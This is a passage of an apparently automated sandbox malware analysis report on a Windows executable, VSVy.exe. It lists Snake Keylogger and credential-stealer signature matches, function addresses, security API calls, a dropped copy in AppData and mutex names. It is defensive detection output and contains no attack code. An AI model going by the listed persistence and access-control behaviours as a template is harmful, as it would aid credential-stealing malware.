              Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F460F8 NtQueryInformationProcess,0_2_00F460F8
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F45D3C NtQueryInformationProcess,0_2_00F45D3C
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E36230 NtQueryInformationProcess,11_2_04E36230
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E3622A NtQueryInformationProcess,11_2_04E3622A
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F422000_2_00F42200
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F463080_2_00F46308
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F420A50_2_00F420A5
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F421F00_2_00F421F0
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F435100_2_00F43510
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F465130_2_00F46513
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F458FB0_2_00F458FB
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F419BC0_2_00F419BC
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F419470_2_00F41947
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F419120_2_00F41912
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F459080_2_00F45908
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F42A980_2_00F42A98
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F42A880_2_00F42A88
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F41BC80_2_00F41BC8
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F41B220_2_00F41B22
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F41CB60_2_00F41CB6
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F41EDA0_2_00F41EDA
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_00F41F260_2_00F41F26
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_028D6B580_2_028D6B58
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_028D5E700_2_028D5E70
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_028DA3D00_2_028DA3D0
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_028DA3E00_2_028DA3E0
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_028DA0E00_2_028DA0E0
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_028DA0F00_2_028DA0F0
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_028D906A0_2_028D906A
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_028D58890_2_028D5889
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_028D58940_2_028D5894
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_095788A80_2_095788A8
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_09570EB10_2_09570EB1
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_0957A9010_2_0957A901
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_095708500_2_09570850
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_095708420_2_09570842
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_097793500_2_09779350
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_097729F80_2_097729F8
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_097711B80_2_097711B8
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_097715F00_2_097715F0
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_09770D800_2_09770D80
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_09772E300_2_09772E30
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_09772E200_2_09772E20
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012C711810_2_012C7118
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CC14610_2_012CC146
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CA08810_2_012CA088
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012C537010_2_012C5370
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CD27810_2_012CD278
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CC46810_2_012CC468
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CC73810_2_012CC738
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012C69A010_2_012C69A0
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CE98810_2_012CE988
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CCA0810_2_012CCA08
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CCCD810_2_012CCCD8
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CCFAA10_2_012CCFAA
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012C3E0910_2_012C3E09
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CF96110_2_012CF961
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012CE97A10_2_012CE97A
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012C29EC10_2_012C29EC
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_012C3AB110_2_012C3AB1
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_068EB97810_2_068EB978
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_068E4E1F10_2_068E4E1F
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_068E4E2010_2_068E4E20
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_068E1B4C10_2_068E1B4C
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D6CA111_2_049D6CA1
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D5A8611_2_049D5A86
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D559811_2_049D5598
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D55A111_2_049D55A1
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D55D411_2_049D55D4
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D55C811_2_049D55C8
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049DA29011_2_049DA290
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049DA2A011_2_049DA2A0
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D933011_2_049D9330
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D9FB811_2_049D9FB8
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D9FB611_2_049D9FB6
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E3803811_2_04E38038
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E3220011_2_04E32200
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E334D111_2_04E334D1
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E3351011_2_04E33510
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E3802911_2_04E38029
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E331F911_2_04E331F9
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E3211D11_2_04E3211D
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E3128711_2_04E31287
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E3824311_2_04E38243
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E3191211_2_04E31912
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E32A8811_2_04E32A88
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04E32A9811_2_04E32A98
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04FE871811_2_04FE8718
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04FE2FC811_2_04FE2FC8
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04FE2FB811_2_04FE2FB8
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04FE0F5011_2_04FE0F50
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04FE2B9011_2_04FE2B90
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04FE138811_2_04FE1388
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04FE0B1811_2_04FE0B18
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9D27816_2_02D9D278
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9537016_2_02D95370
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9A08816_2_02D9A088
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9C14716_2_02D9C147
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9C73816_2_02D9C738
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9C46816_2_02D9C468
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9CA0816_2_02D9CA08
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9E98816_2_02D9E988
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D969A016_2_02D969A0
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D93E0916_2_02D93E09
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D96FC816_2_02D96FC8
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9CFA916_2_02D9CFA9
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9CCD816_2_02D9CCD8
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D93AA116_2_02D93AA1
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D939ED16_2_02D939ED
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D929EC16_2_02D929EC
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9E97B16_2_02D9E97B
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D9F96116_2_02D9F961
              Source: VSVy.exe, 00000000.00000002.2248768880.0000000009CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs VSVy.exe
              Source: VSVy.exe, 00000000.00000002.2244413359.0000000004162000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs VSVy.exe
              Source: VSVy.exe, 00000000.00000002.2243342414.00000000028A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs VSVy.exe
              Source: VSVy.exe, 00000000.00000002.2243490956.0000000002B97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs VSVy.exe
              Source: VSVy.exe, 00000000.00000002.2249312439.000000000B328000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs VSVy.exe
              Source: VSVy.exe, 00000000.00000002.2241745741.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VSVy.exe
              Source: VSVy.exe, 00000000.00000002.2248768880.0000000009CC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs VSVy.exe
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs VSVy.exe
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs VSVy.exe
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs VSVy.exe
              Source: VSVy.exe, 0000000A.00000002.3899728061.0000000000BF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs VSVy.exe
              Source: VSVy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: VSVy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: gJfOOh.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, -O-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, -O-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, -O-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, -O-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, gcOGR2CVZ5gWDXuqnV.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, gcOGR2CVZ5gWDXuqnV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, gcOGR2CVZ5gWDXuqnV.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, gcOGR2CVZ5gWDXuqnV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, gcOGR2CVZ5gWDXuqnV.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, gcOGR2CVZ5gWDXuqnV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@4/4
              Source: C:\Users\user\Desktop\VSVy.exeFile created: C:\Users\user\AppData\Roaming\gJfOOh.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMutant created: \Sessions\1\BaseNamedObjects\FIpBPWSxHGNpkuPkADh
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
